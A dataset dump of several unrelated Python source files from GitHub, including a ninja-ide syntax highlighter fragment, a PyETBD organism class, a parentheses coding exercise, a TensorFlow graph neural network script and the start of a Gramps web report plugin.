# Otherwise, look for the delimiter on this line\n else:\n start = delimiter.indexIn(text)\n # Move past this match\n add = delimiter.matchedLength()\n\n # As long as there's a delimiter match on this line...\n while start >= 0:\n # Look for the ending delimiter\n end = delimiter.indexIn(text, start + add)\n # Ending delimiter on this line?\n if end >= add:\n length = end - start + add + delimiter.matchedLength()\n self.setCurrentBlockState(0)\n # No; multi-line string\n else:\n self.setCurrentBlockState(in_state)\n length = text.length() - start + add\n # Apply formatting\n self.setFormat(start, length, style)\n # Look for the next match\n start = delimiter.indexIn(text, start + length)\n\n # Return True if still inside a multi-line string, False otherwise\n if self.currentBlockState() == in_state:\n return True\n else:\n return False\n","repo_name":"calpe20/PYTHONIZANDO","sub_path":"TKINTER/ninja-ide/gui/qt/main_panel/editor/highlighter.py","file_name":"highlighter.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"42694070377","text":"'''\nCreated on May 21, 2021\nTranslated May 23, 2021\n\n@author: bleem\n'''\nfrom src.common import Constants\nfrom src.common import Converter\nfrom src.common.BehaviorsInfo import BehaviorsInfo\nfrom src.common.RescorlaWagnerParameters import RescorlaWagnerParameters\nfrom src.etbd.MutationInfo import MutationInfo\nfrom src.etbd.RecombinationInfo import RecombinationInfo\nfrom src.etbd.SelectionInfo import SelectionInfo\n\n\n# This class is an abstract container for the specific organisms\nclass AnOrganism:\n\t''' \n\tclassdocs\n\t'''\n\n\tdef __init__(self, json_data):\n\t\tself.m_currentSDColor = Constants.SD_COLOR_NULL\n\t\tself.stuBehaviorsInfo = self.load_behaviors_info(json_data)\n\n\tdef get_behaviors_info(self):\n\t\treturn self.stuBehaviorsInfo\n\n\tdef load_behaviors_info(self, json_data):\n\t\tstuBehaviorsInfo = BehaviorsInfo()\n\t\t# Dim objPopulation As Behaviors\n\t\t# Dim objStringBuilder As New System.Text.StringBuilder\n\t\t#Read form--------------------------------------------------\n\t\t# Get discriminative stimulus\n\t\tstuBehaviorsInfo.set_sdid(json_data.get_sdid())\n\t\tif stuBehaviorsInfo.get_sdid() == -1:\n\t\t\treturn # This SD as already been used.\n\n\t\t# Gray codes\n\t\tif json_data.use_gray_codes():\n\t\t\tstuBehaviorsInfo.set_use_gray_codes(True)\n\t\telse:\n\t\t\tstuBehaviorsInfo.set_use_gray_codes(False)\n\n\t\t# Properties\n\t\tstuBehaviorsInfo.set_decay_of_transfer(json_data.get_decay_of_transfer())\n\t\tstuBehaviorsInfo.set_fomo_a(json_data.get_fomo_a())\n\n\t\t#-----Viscosity\n\t\tif json_data.add_viscosity():\n\t\t\tstuBehaviorsInfo.set_viscosity_ticks(json_data.get_viscosity_ticks())\n\t\t\tif json_data.get_viscosity_selected_index() == 0:\n\t\t\t\t# \"original\"\n\t\t\t\tstuBehaviorsInfo.set_create_from_synthetic(False)\n\t\t\telse:\n\t\t\t\t# \"amalgamated\"\n\t\t\t\tstuBehaviorsInfo.set_create_from_synthetic(True)\n\n\t\telse:\n\t\t\t# if populations are to have no viscosity, then ViscosityTicks = 0\n\t\t\t# Note that when ViscosityTicks = 1 there is also no viscosity.\n\t\t\t# When ViscosityTicks = 0, the standard method of emitting a behavior\n\t\t\t# (random selection among phenotypes) is used; when ViscosityTicks = 1\n\t\t\t# the method based on relative frequencies is used.\n\t\t\t# Both methods should give the same results.\n\t\t\tstuBehaviorsInfo.set_viscosity_ticks(0)\n\n\t\tstuBehaviorsInfo.set_num_behaviors(json_data.get_num_behaviors())\n\t\tstuBehaviorsInfo.set_low_phenotype(json_data.get_low_phenotype())\n\t\tstuBehaviorsInfo.set_high_phenotype(json_data.get_high_phenotype())\n\t\tstuBehaviorsInfo.set_percent_to_replace(json_data.get_percent_to_replace())\n\t\tstuBehaviorsInfo.set_percent_to_replace_2(json_data.get_percent_to_replace_2())\n\t\tstuBehaviorsInfo.set_fitness_method(json_data.get_fitness_method())\n\t\tstuBehaviorsInfo.set_fitness_landscape(json_data.get_fitness_landscape())\n\t\tstuBehaviorsInfo.set_punishment_method(json_data.get_punishment_method())\n\t\t# Data structures\n\t\tstuBehaviorsInfo.set_RW_info(self.load_RW_info(json_data))\n\t\tstuBehaviorsInfo.set_selection_info(self.load_selection_info(json_data))\n\t\tstuBehaviorsInfo.set_recombination_info(self.load_recombination_info(json_data))\n\t\tstuBehaviorsInfo.set_mutation_info(self.load_mutation_info(json_data))\n\t\t# Non-ETBD parameters\n\t\tstuBehaviorsInfo.set_num_hidden_nodes(json_data.get_num_hidden_nodes())\n\t\tstuBehaviorsInfo.set_num_output_nodes(json_data.get_num_output_nodes())\n\t\tstuBehaviorsInfo.set_num_firing_hidden_nodes(json_data.get_num_firing_hidden_nodes())\n\n\t\tstuBehaviorsInfo.set_net_one_magnitude_slope(json_data.get_net_one_magnitude_slope())\n\t\tstuBehaviorsInfo.set_net_one_magnitude_intercept(json_data.get_net_one_magnitude_intercept())\n\t\tstuBehaviorsInfo.set_net_one_neutral_magnitude(json_data.get_net_one_neutral_magnitude())\n\n\t\tstuBehaviorsInfo.set_net_two_neutral_magnitude(json_data.get_net_two_neutral_magnitude())\n\t\tstuBehaviorsInfo.set_net_two_selection_strength_exponent(json_data.get_net_two_selection_strength_exponent())\n\t\tstuBehaviorsInfo.set_net_two_selection_strength_multiplier(json_data.get_net_two_selection_strength_multiplier())\n\t\tstuBehaviorsInfo.set_net_two_num_hidden_nodes(json_data.get_net_two_num_hidden_nodes())\n\n\t\tstuBehaviorsInfo.set_ml_learning_rate(json_data.get_ml_learning_rate())\n\t\tstuBehaviorsInfo.set_ml_num_slots(json_data.get_ml_num_slots())\n\t\tstuBehaviorsInfo.set_ml_reward_multiplier(json_data.get_ml_reward_multiplier())\n\t\tstuBehaviorsInfo.set_ml_reward_exponent(json_data.get_ml_reward_exponent())\n\t\tstuBehaviorsInfo.set_ml_pessimism(json_data.get_ml_pessimism())\n\t\tstuBehaviorsInfo.set_ml_extinction(json_data.get_ml_extinction())\n\t\tstuBehaviorsInfo.set_ml_epsilon(json_data.get_ml_epsilon())\n\t\tstuBehaviorsInfo.set_ml_discount_rate(json_data.get_ml_discount_rate())\n\n\t\treturn stuBehaviorsInfo\n\n\tdef reset_state(self):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef is_ready_to_emit(self):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef emit_behavior(self):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef set_selection(self, selectionParameter, value):\n\t\traise NotImplementedError\n\t\t# TODO - implement this for the other organism types\n\n\tdef load_selection_info(self, json_data):\n\n\t\tstuSelectionInfo = SelectionInfo()\n\t\tstuSelectionInfo.set_selection_method(json_data.get_selection_method())\n\t\tstuSelectionInfo.set_continuous_function_form(json_data.get_continuous_function_form())\n\n\t\t# High Phenotype------------------------------------------------------(added to implement punishment)\n\t\tstuSelectionInfo.set_high_phenotype(json_data.get_high_phenotype())\n\n\t\t# Fitness Landscare---------------------------------------------------(added to implement punishment)\n\t\tstuSelectionInfo.set_fitness_landscape(json_data.get_fitness_landscape())\n\t\tstuSelectionInfo.set_matchmaking_method(json_data.get_matchmaking_method())\n\n\t\treturn stuSelectionInfo\n\n\tdef load_recombination_info(self, json_data):\n\n\t\tstuRecombinationInfo = RecombinationInfo()\n\t\tstuRecombinationInfo.set_method(json_data.get_recombination_method())\n\n\t\tif json_data.get_recombination_method() == Constants.RECOMBINATION_METHOD_CROSSOVER:\n\t\t\tstuRecombinationInfo.set_points(json_data.get_crossover_points())\n\n\t\treturn stuRecombinationInfo\n\n\tdef load_mutation_info(self, json_data):\n\n\t\tstuMutationInfo = MutationInfo()\n\t\tstuMutationInfo.set_method(json_data.get_mutation_method())\n\n\t\tif stuMutationInfo.get_method() == Constants.MUTATION_METHOD_GAUSSIAN:\n\t\t\tstuMutationInfo.set_sd(json_data.get_gaussian_mutation_sd())\n\t\t\tstuMutationInfo.set_boundary(json_data.get_mutation_boundary())\n\n\t\tstuMutationInfo.set_rate(json_data.get_mutation_rate())\n\n\t\t# Redundant info needed by the Mutator object\n\t\tif json_data.use_gray_codes():\n\t\t\tstuMutationInfo.set_use_gray_codes(True)\n\t\telse:\n\t\t\tstuMutationInfo.set_use_gray_codes(False)\n\t\tstuMutationInfo.set_high_phenotype(json_data.get_high_phenotype())\n\t\tstuMutationInfo.set_low_phenotype(json_data.get_low_phenotype())\n\n\t\treturn stuMutationInfo\n\n\tdef get_sdcolor(self):\n\t\treturn self.m_currentSDColor\n\n\tdef get_sdcolor_str(self):\n\t\treturn Converter.convert_sd_color_to_string(self.m_currentSDColor)\n\n\tdef set_sdcolor(self, value):\n\t\traise NotImplementedError\n\n\tdef load_RW_info(self, json_data):\n\n\t\tstuRWInfo = RescorlaWagnerParameters()\n\n\t\tstuRWInfo.set_alpha(json_data.get_alpha())\n\t\tstuRWInfo.set_beta_0(json_data.get_beta_0())\n\t\tstuRWInfo.set_beta_1(json_data.get_beta_1())\n\t\tstuRWInfo.set_berg_a(1) # Hard coded to 1 for now.\n\t\tstuRWInfo.set_lambda(1) # Hard coded to 1 for now.\n\n\t\treturn stuRWInfo\n","repo_name":"misterriley/PyETBD","sub_path":"src/orgs/AnOrganism.py","file_name":"AnOrganism.py","file_ext":"py","file_size_in_byte":7479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25751003092","text":"from django.db import models\n\n# Create your models here.\nDUES_TYPE = [\n\t('NEWQ1', 'New member - Jan to Dec'),\n\t('NEWQ2', 'New member - Apr to Dec'),\n\t('NEWQ3', 'New member - Jul to Dec'),\n\t('NEWQ4', 'New member - Oct to Dec'),\n\t('RENEW', 'Renewal - Jan to Dec'),\n]","repo_name":"pineapplejuice/earc2-members","sub_path":"helpers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28026990567","text":"data = \"\"\"Given a string containing just the characters '(' and ')', return the length of the longest valid (well-formed) parentheses substring\nExample 1:\n\nInput: s = \"(()\"\nOutput: 2\nExplanation: The longest valid parentheses substring is \"()\".\nExample 2:\n\nInput: s = \")()())\"\nOutput: 4\nExplanation: The longest valid parentheses substring is \"()()\".\n\n\"\"\"\n\n\nclass Solution:\n\n def longestValidParentheses(self, s: str) -> int:\n stack = []\n max_1 = 0\n count = 0\n for c in s:\n if c == '(':\n stack.append('(')\n elif c == ')' and stack:\n if stack[-1] == '(':\n count += 2\n stack.pop()\n else:\n count = 0\n if max_1 < count:\n max_1 = count\n max_2 = 0\n count = 0\n if max_1 != len(s):\n stack = []\n for c in s[::-1]:\n if c == ')':\n stack.append(')')\n elif c == '(' and stack:\n if stack[-1] == ')':\n count += 2\n stack.pop()\n else:\n count = 0\n if max_2 < count:\n max_2 = count\n print(max_1, max_2)\n return max_1 if max_1 <= max_2 and max_2 != 0 else max_2\n\n\nprint(Solution().longestValidParentheses(\")()())\"))\n","repo_name":"laxman590249/Data-Structures","sub_path":"DataStructures/DP/maximum_valid_para.py","file_name":"maximum_valid_para.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21445685063","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nimport numpy as np\nimport math\nimport molecule_predictionv2_0 as mp\n\n\n# In[5]:\n\n\nimport tensorflow as tf\n\n\n# In[6]:\n\n\ndat = mp.molecule_prediction_data_wrapper()\n\n\n# In[21]:\n\n\natom_vector_size = 1024\nnum_timesteps = 5\nhidden_unit_size = 1024\nbatchSize = 32\nnum_epochs = 200\nbatch_gen = dat.batch_gen\ndataset = tf.data.Dataset. from_generator(batch_gen.generate, (tf.float32,tf.float32),\n output_shapes= (tf.TensorShape([30,1054]), \n tf.TensorShape([3]))) \ndataset = dataset.shuffle(buffer_size = batchSize*10) \ndataset = dataset.repeat(num_epochs).batch(batchSize)\ndataset = dataset.prefetch(buffer_size = 2)\ndata_source = dataset.make_one_shot_iterator()\nbatch_in, batch_y = data_source.get_next()\n\n\n# In[8]:\n\n\nwith tf.variable_scope('message_transform_network'):\n hidden1 = tf.keras.layers.Dense(2048,activation='relu')\n hidden1.build((None,atom_vector_size))\n hidden2 = tf.keras.layers.Dense(2048,activation='tanh')\n hidden2.build((None,2048))\n hidden3 = tf.keras.layers.Dense(1024,activation='relu')\n hidden3.build((None,2048))\n out_message = tf.keras.layers.Dense(atom_vector_size)\n out_message.build((None, 1024))\ndef apply_edge_neural_network_transform(input):\n return out_message.apply(hidden3.apply(hidden2.apply(hidden1.apply(input))))\n\n\n# In[9]:\n\n\ndef get_messages(ordered_atoms_vector, adjacency_matrix):\n transformed = apply_edge_neural_network_transform(ordered_atoms_vector)\n return tf.matmul(adjacency_matrix,transformed)\n\n\n# In[10]:\n\n\nwith tf.variable_scope(\"RecusiveUnitLTSM\"):\n shared_lstm_cell = tf.keras.layers.LSTMCell(hidden_unit_size);\ndef iterate_time_step(states_vectors_t, messages):\n (outputs_t, states_vectors_t_1) = shared_lstm_cell(messages, states_vectors_t)\n return outputs_t, states_vectors_t_1\n\n\n# In[11]:\n\n\ninitial_state1 = tf.Variable(np.random.normal(size=(1,hidden_unit_size)),\n trainable=True,dtype=tf.float32);\ninitial_state2 = tf.Variable(np.random.normal(size=(1,hidden_unit_size)),\n trainable=True,dtype=tf.float32);\ninitial_states1 = tf.reshape(tf.tile(initial_state1, (1,tf.shape(batch_in)[1])),\n [tf.shape(batch_in)[1], hidden_unit_size])\ninitial_states2 = tf.reshape(tf.tile(initial_state2, (1,tf.shape(batch_in)[1])),\n [tf.shape(batch_in)[1], hidden_unit_size])\ninitial_states = (initial_states1,initial_states2)\n\n\n# In[12]:\n\n\ndef extract_atom_vectors_ad_matrix(input_mat):\n num_atoms = tf.shape(input_mat)[0]\n return tf.slice(input_mat,[0,0],[num_atoms,atom_vector_size]), tf.slice(input_mat,[0,atom_vector_size],[num_atoms,num_atoms])\n\n\n# In[13]:\n\n\ndef graph_neural_network(concatenated_input_mat):\n global initial_states\n initial_output,ad_matrix = extract_atom_vectors_ad_matrix(concatenated_input_mat)\n outputs_x = initial_output\n states_vectors_x = initial_states\n for i in range(num_timesteps):\n messages = get_messages(outputs_x, ad_matrix)\n outputs_x, states_vectors_x = iterate_time_step(states_vectors_x,messages) \n final_outputs = outputs_x\n out = tf.reduce_sum(final_outputs, axis=0)\n return out \n\n\n# In[25]:\n\n\nfinal_outputs=tf.map_fn(graph_neural_network,batch_in)\nprediction = tf.keras.layers.Dense(3)(final_outputs)\nwith tf.name_scope(\"loss\"):\n loss = tf.losses.mean_squared_error(batch_y, prediction)\n\n\n# In[15]:\n\n\nlearning_rate = 0.001\nwith tf.name_scope(\"train\"):\n global training_op\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n training_op = optimizer.minimize(loss)\n\n\n# In[27]:\n\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n init.run()\n for epoch in range(num_epochs):\n for iteration in range(batch_gen.samples// batchSize):\n _,loss_value = sess.run([training_op,loss])\n if iteration % 500 == 0:\n print(\"Epoch \" + str(epoch) + \" Step \" + str(iteration) + \" loss \" + str(loss_value))\n if epoch % 20 == 0:\n save_path = saver.save(sess, \"../models/graph_model_\" + str(epoch) + \".ckpt\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"neilhazra/KaggleMoleculePrediction","sub_path":"MoleculePrediction/Preliminary/GraphNeuralNetworkTest.py","file_name":"GraphNeuralNetworkTest.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37521617327","text":"from __future__ import print_function, division\nfrom functools import partial\nimport os\nimport sys\nimport re\nimport copy\nimport time\nimport shutil\nimport codecs\nimport tarfile\nimport tempfile\nif sys.version_info[0] < 3:\n\tfrom cStringIO import StringIO\n\tstring_types = basestring\nelse:\n\tfrom io import StringIO\n\tstring_types = str\nfrom textwrap import TextWrapper\nfrom unicodedata import normalize\nfrom collections import defaultdict\nfrom xml.sax.saxutils import escape\nif (sys.version_info[0] < 3):\n\timport urlparse, urllib\nelse:\n\timport urllib, urllib.parse as urlparse\nimport zipfile\n\nfrom operator import itemgetter\nfrom decimal import Decimal, getcontext\ngetcontext().prec = 8\n\n\n#------------------------------------------------\n# Set up logging\n#------------------------------------------------\nimport logging\nlog = logging.getLogger(\".DynamicWeb\")\n# The log initialization shall be performed after Gramps start-up (i.e. not here)\n\n#------------------------------------------------\n# Gramps module\n#------------------------------------------------\n\n\nfrom gramps.gen.const import IMAGE_DIR, GRAMPS_LOCALE as glocale\ntry:\n\t_trans = glocale.get_addon_translator(__file__)\nexcept ValueError:\n\t_trans = glocale.translation\n_ = _trans.sgettext\n\nfrom gramps.version import VERSION, VERSION_TUPLE\nDWR_VERSION_410 = (VERSION_TUPLE[0] >= 4) and (VERSION_TUPLE[1] >= 1)\nDWR_VERSION_412 = (VERSION_TUPLE[0] >= 4) and (VERSION_TUPLE[1] >= 1) and (VERSION_TUPLE[2] >= 2)\nDWR_VERSION_420 = (VERSION_TUPLE[0] >= 4) and (VERSION_TUPLE[1] >= 2)\nfrom gramps.gen.lib import (ChildRefType, Date, EventType, FamilyRelType, Name,\n\t\t\t\t\t\t\tNameType, Person, UrlType, NoteType,\n\t\t\t\t\t\t\tEventRoleType, Family, Event, Place, Source,\n\t\t\t\t\t\t\tCitation, MediaObject, Repository, Note, Tag,\n\t\t\t\t\t\t\tMediaRef, Location)\nif (DWR_VERSION_410):\n\tfrom gramps.gen.lib import PlaceType\nfrom gramps.gen.lib.date import Today\nfrom gramps.gen.const import PROGRAM_NAME, URL_HOMEPAGE\nfrom gramps.gen.plug.menu import (PersonOption, NumberOption, StringOption,\n\tBooleanOption, EnumeratedListOption, FilterOption,\n\tNoteOption, MediaOption, DestinationOption, ColorOption)\nfrom gramps.gen.plug.report import (Report, Bibliography)\nfrom gramps.gen.plug.report import utils as report_utils\nfrom gramps.gen.plug.report import MenuReportOptions\n\nfrom gramps.gen.utils.config import get_researcher\nfrom gramps.gen.utils.string import conf_strings\nfrom gramps.gen.utils.file import media_path_full\nfrom gramps.gen.utils.alive import probably_alive\nfrom gramps.gen.utils.db import get_source_and_citation_referents, get_birth_or_fallback, get_death_or_fallback, get_marriage_or_fallback\nfrom gramps.gen.constfunc import win, conv_to_unicode, get_curr_dir\nif (sys.version_info[0] < 3):\n\tfrom gramps.gen.constfunc import UNITYPE\nelse:\n\tUNITYPE = str\nfrom gramps.gen.config import config\nfrom gramps.gui.thumbnails import get_thumbnail_path, run_thumbnailer\nfrom gramps.gen.utils.image import image_size, resize_to_jpeg_buffer\nfrom gramps.gen.mime import get_description\nfrom gramps.gen.display.name import displayer as _nd\nif (DWR_VERSION_412):\n\tfrom gramps.gen.display.place import displayer as _pd\nfrom gramps.gen.datehandler import get_date_formats, displayer as _dd\nfrom gramps.gen.proxy import PrivateProxyDb, LivingProxyDb\nfrom gramps.plugins.lib.libhtmlconst import _CHARACTER_SETS, _CC, _COPY_OPTIONS\n\n# import HTML Class from src/plugins/lib/libhtml.py\nfrom gramps.plugins.lib.libhtml import Html, xml_lang\n\n# import styled notes from src/plugins/lib/libhtmlbackend.py\nfrom gramps.plugins.lib.libhtmlbackend import HtmlBackend, process_spaces\n\nfrom gramps.plugins.lib.libgedcom import make_gedcom_date, DATE_QUALITY\n\nfrom gramps.plugins.webreport.narrativeweb import first_letter\n\nfrom gramps.gen.utils.place import conv_lat_lon\nfrom gramps.gui.pluginmanager import GuiPluginManager\n\nfrom gramps.gen.relationship import get_relationship_calculator\nif (DWR_VERSION_410):\n\tfrom gramps.gen.utils.location import get_main_location\n\nfrom gramps.gui.widgets.fanchart import (\n\tGENCOLOR,\n\tGRADIENTSCALE,\n\tBACKGROUND_SCHEME1,\n\tBACKGROUND_SCHEME2,\n\tBACKGROUND_GENDER,\n\tBACKGROUND_WHITE,\n\tBACKGROUND_GRAD_GEN,\n\tBACKGROUND_GRAD_AGE,\n\tBACKGROUND_SINGLE_COLOR,\n\tBACKGROUND_GRAD_PERIOD,\n)\nfrom gramps.gui.utils import hex_to_rgb\n\nSORT_KEY = glocale.sort_key\n\n#------------------------------------------------\n# constants\n#------------------------------------------------\n\n#: Maximum number of pages containing custom text\nNB_CUSTOM_PAGES = 5\n#: Maximum number of pages =\nNB_TOTAL_PAGES_MAX = 15\n#: Liste of the pages (description, title, file name)\nPAGES_NAMES = [\n\t(_(\"Person page\"), _(\"Person\"), \"person.html\"),\n\t(_(\"Surnames index page\"), _(\"Surnames\"), \"surnames.html\"),\n\t(_(\"Individuals index page\"), _(\"Individuals\"), \"persons.html\"),\n\t(_(\"Families index page\"), _(\"Families\"), \"families.html\"),\n\t(_(\"Sources index page\"), _(\"Sources\"), \"sources.html\"),\n\t(_(\"Media index page\"), _(\"Media\"), \"medias.html\"),\n\t(_(\"Places index page\"), _(\"Places\"), \"places.html\"),\n\t(_(\"Addresses page\"), _(\"Addresses\"), \"address.html\"),\n\t(_(\"Repositories index page\"), _(\"Repositories\"), \"repositories.html\"),\n\t(_(\"SVG graphical tree\"), _(\"Tree\"), \"tree_svg.html\"),\n] + [\n\t(_(\"Custom page %(index)i\") % {\"index\": i + 1}, _(\"Custom\"), \"custom_%i.html\" % (i + 1))\n\tfor i in range(NB_CUSTOM_PAGES)\n]\n\n# Constants used as indexes in L{PAGES_NAMES}\n(PAGE_PERSON,\nPAGE_SURNAMES,\nPAGE_PERSON_INDEX,\nPAGE_FAMILY_INDEX,\nPAGE_SOURCE_INDEX,\nPAGE_MEDIA_INDEX,\nPAGE_PLACE_INDEX,\nPAGE_ADDRESS_INDEX,\nPAGE_REPOSITORY_INDEX,\nPAGE_SVG_TREE,\nPAGE_CUSTOM) = range(11)\n\n# List of the descriptions of the tree graphs types\nSVG_TREE_TYPES = [\n\t_(\"Ascending tree\"),\n\t_(\"Descending tree\"),\n\t_(\"Descending tree with spouses\"),\n\t_(\"Ascending and descending tree\"),\n\t_(\"Ascending and descending tree with spouses\"),\n]\n(SVG_TREE_TYPE_ASCENDING,\nSVG_TREE_TYPE_DESCENDING,\nSVG_TREE_TYPE_DESCENDING_SPOUSES,\nSVG_TREE_TYPE_ASCDESC,\nSVG_TREE_TYPE_ASCDESC_SPOUSES) = range(len(SVG_TREE_TYPES))\nDEFAULT_SVG_TREE_TYPE = SVG_TREE_TYPE_ASCDESC\n\nSVG_TREE_SHAPES = [\n\t_(\"Vertical (↓)\"),\n\t_(\"Vertical (↑)\"),\n\t_(\"Horizontal (→)\"),\n\t_(\"Horizontal (←)\"),\n\t_(\"Full Circle\"),\n\t_(\"Half Circle\"),\n\t_(\"Quadrant\"),\n]\n(SVG_TREE_SHAPE_VERTICAL_TOP_BOTTOM,\nSVG_TREE_SHAPE_VERTICAL_BOTTOM_TOP,\nSVG_TREE_SHAPE_HORIZONTAL_LEFT_RIGHT,\nSVG_TREE_SHAPE_HORIZONTAL_RIGHT_LEFT,\nSVG_TREE_SHAPE_CIRCLE,\nSVG_TREE_SHAPE_HALF_CIRCLE,\nSVG_TREE_SHAPE_QUADRANT) = range(len(SVG_TREE_SHAPES))\nDEFAULT_SVG_TREE_SHAPE = SVG_TREE_SHAPE_HORIZONTAL_LEFT_RIGHT\n\nSVG_TREE_DISTRIB_ASC = [\n\t_('Size proportional to number of ancestors'),\n\t_('Homogeneous parents distribution'),\n]\nSVG_TREE_DISTRIB_DSC = [\n\t_('Size proportional to number of descendants'),\n\t_('Homogeneous children distribution'),\n]\n(SVG_TREE_DISTRIB_PROPORTIONAL,\nSVG_TREE_DISTRIB_HOMOGENEOUS) = range(len(SVG_TREE_DISTRIB_ASC))\nDEFAULT_SVG_TREE_DISTRIB = SVG_TREE_DISTRIB_PROPORTIONAL\n\nSVG_TREE_BACKGROUNDS = [\n\t_('Gender colors'),\n\t_('Generation based gradient'),\n\t_('Age based gradient'),\n\t_('Single main (filter) color'),\n\t_('Time period based gradient'),\n\t_('White'),\n\t_('Color scheme classic report'),\n\t_('Color scheme classic view'),\n]\n(SVG_TREE_BACKGROUND_GENDER,\nSVG_TREE_BACKGROUND_GENERATION,\nSVG_TREE_BACKGROUND_AGE,\nSVG_TREE_BACKGROUND_SINGLE,\nSVG_TREE_BACKGROUND_PERIOD,\nSVG_TREE_BACKGROUND_WHITE,\nSVG_TREE_BACKGROUND_SCHEME1,\nSVG_TREE_BACKGROUND_SCHEME2) = range(len(SVG_TREE_BACKGROUNDS))\nDEFAULT_SVG_TREE_BACKGROUND = SVG_TREE_BACKGROUND_GENERATION\n\n#: Templates for the website, in the form: [directory, name]\n# First template is the default one:\n# The files in the default template are used when they are not present in another template\n# Only the files that are different from the default template are present in the other templates directories\nWEB_TEMPLATE_LIST = (\n\t(\"dwr_default\", _(\"Default\")),\n\t(\"dwr_mainz\", _(\"Mainz\")),\n)\n\n\nINCLUDE_LIVING_VALUE = 99 #: Arbitrary number\n\n# Indexes in the L{DynamicWebReport.obj_dict} and L{DynamicWebReport.bkref_dict} elements\nOBJDICT_NAME = 0\nOBJDICT_GID = 1\nOBJDICT_INDEX = 2\nBKREF_CLASS = 0\nBKREF_HANDLE = 1\nBKREF_REFOBJ = 2\n\n\n_html_dbl_quotes = re.compile(r'([^\"]*) \" ([^\"]*) \" (.*)', re.VERBOSE)\n_html_sng_quotes = re.compile(r\"([^']*) ' ([^']*) ' (.*)\", re.VERBOSE)\n\ndef html_escape(text):\n\t\"\"\"Convert the text and replace some characters with a &# variant.\"\"\"\n\t# First single characters, no quotes\n\ttext = escape(text)\n\t# Deal with double quotes.\n\tm = _html_dbl_quotes.match(text)\n\twhile m:\n\t\ttext = \"%s\" \"“\" \"%s\" \"”\" \"%s\" % m.groups()\n\t\tm = _html_dbl_quotes.match(text)\n\t# Replace remaining double quotes.\n\ttext = text.replace('\"', '"')\n\t# Deal with single quotes.\n\ttext = text.replace(\"'s \", '’s ')\n\tm = _html_sng_quotes.match(text)\n\twhile m:\n\t\ttext = \"%s\" \"‘\" \"%s\" \"’\" \"%s\" % m.groups()\n\t\tm = _html_sng_quotes.match(text)\n\t# Replace remaining single quotes.\n\ttext = text.replace(\"'\", ''')\n\n\treturn text\n\n\ndef script_escape(text):\n\t\"\"\"Convert the text and escape quotes, backslashes and end-of-lines\n\t\"\"\"\n\treturn(text.\n\t\treplace(\"\\\\\", \"\\\\\\\\\").\n\t\treplace(\"'\", \"\\\\'\").\n\t\treplace(\"\\\"\", \"\\\\\\\"\").\n\t\treplace(\"\\n\", \"\\\\n\")\n\t)\n\n\ndef html_text(html):\n\t\"\"\"Get the string corresponding to an L{Html} object\"\"\"\n\tif (isinstance(html, string_types)): return(html.strip())\n\tsw = StringIO()\n\thtml.write(partial(print, file = sw), indent = \"\", tabs = \"\")\n\treturn(sw.getvalue().strip())\n\n\ndef format_date(date, gedcom = False, iso = False):\n\t\"\"\"Give the date as a string\n\t@param iso: If True, the date should be given in ISO format: YYYY-MM-DD\n\t@type iso: Boolean\n\t\"\"\"\n\tif (not date): return(\"\")\n\t\n\tval = \"\"\n\t\n\tif (iso):\n\t\t# TODO: export ISO dates\n\t\t# if (iso): val = DateDisplay.display(date) or \"\"\n\t\t# else: val = _dd.display(date) or \"\"\n\t\tpass\n\t\t\n\telif (gedcom):\n\t\tstart = date.get_start_date()\n\t\tif start != Date.EMPTY:\n\t\t\tcal = date.get_calendar()\n\t\t\tmod = date.get_modifier()\n\t\t\tquality = date.get_quality()\n\t\t\tif quality in DATE_QUALITY:\n\t\t\t\tqual_text = DATE_QUALITY[quality] + \" \"\n\t\t\telse:\n\t\t\t\tqual_text = \"\"\n\t\t\tif mod == Date.MOD_SPAN:\n\t\t\t\tval = \"%sFROM %s TO %s\" % (\n\t\t\t\t\tqual_text,\n\t\t\t\t\tmake_gedcom_date(start, cal, mod, None), \n\t\t\t\t\tmake_gedcom_date(date.get_stop_date(), cal, mod, None))\n\t\t\telif mod == Date.MOD_RANGE:\n\t\t\t\tval = \"%sBET %s AND %s\" % (\n\t\t\t\t\tqual_text,\n\t\t\t\t\tmake_gedcom_date(start, cal, mod, None), \n\t\t\t\t\tmake_gedcom_date(date.get_stop_date(), cal, mod, None))\n\t\t\telse:\n\t\t\t\tval = make_gedcom_date(start, cal, mod, quality)\n\t\t\t\t\n\telse:\n\t\t# Regular Gramps place displayer\n\t\tval = _dd.display(date) or \"\"\n\t\n\treturn(val)\n\n\ndef rmtree_fix(dirname):\n\t\"\"\"Windows fix: Python shutil.rmtree does not work properly on Windows.\n\tUnfortunately this fix is not completely working. Don't know why.\n\tThe strategy is to rename the directory first, in order to let Windows delete it in differed time.\n\t\"\"\"\n\t#TODO: Fix shutil.rmtree on Windows\n\ttmp = dirname + \"_removetree_tmp\"\n\tos.rename(dirname, tmp)\n\tshutil.rmtree(tmp)\n\t# Wait for rmtree to complete\n\tfor i in range(100):\n\t\tif (not os.path.exists(tmp)): break\n\t\ttime.sleep(0.1)\n\n\n\nclass DynamicWebReport(Report):\n\t\"\"\"\n\tClass DynamicWebReport\n\t\n\tExtracts information from the database and exports the data into Javascript and HTML files\n\t\n\tThe database extraction is performed by the method L{_build_obj_dict}. It recursively calls the methods \"_add_***\".\n\t\n\tThe database extraction builds:\n\t - indexes of the objects selected for the report as dictionaries,\n\t - for each object (of the report), references to the objects calling this object.\n\t \n\tThe indexes of the objects selected are stored as dictionaries \"obj_dict[class][handle]\",\n\tindexed by the object 